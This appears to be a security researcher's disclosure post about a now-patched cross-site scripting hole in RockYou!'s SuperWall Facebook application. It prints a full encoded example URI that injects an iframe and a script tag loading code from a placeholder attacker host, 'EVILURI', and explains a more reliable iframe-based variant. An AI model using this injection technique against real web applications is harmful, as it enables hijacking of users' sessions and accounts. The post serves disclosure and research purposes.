Facebook Verified Application
Current Monthly Active Users: 9,767,698
Current Rank on Application Leaderboard: 17
Application Developer: RockYou!
Responsiveness: After announcing this series, a Facebook security contact got in touch and requested more information. I complied, and apparently RockYou! issued a patch after receiving word from Facebook, as I’ve not heard from them but can no longer replicate the issue.
Vulnerability Status: Patched
Capable of Clickjacking Install: No
Example URI: http://apps.facebook.com/superwall/stickers_mainpage.php?type=cards&_ryfbe=fb-wall-header-stickers&msg=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffb.rockyou.com%2Ffacebook_apps%2Frywall%2Fstickers_mainpage.php%3Ftype%3Dcards%26_ryfbe%3Dfb-wall-header-stickers%26msg%3D%2522%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%2522%253E%253C%252Fscript%253E
Notes: When I first figured out how to take advantage of XSS holes in FBML applications, I tried inserting a script element, as shown here. This worked with RockYou Live, but later applications included scripts prior to the insertion point. When taken out of the context of apps.facebook.com, these scripts would generate errors, and the inserted script would fail to execute. I then resorted to inserting another iframe which loaded a special HTML file that included the necessary script payload. Previous FAXX examples use this more reliable trick.
Share with your friends!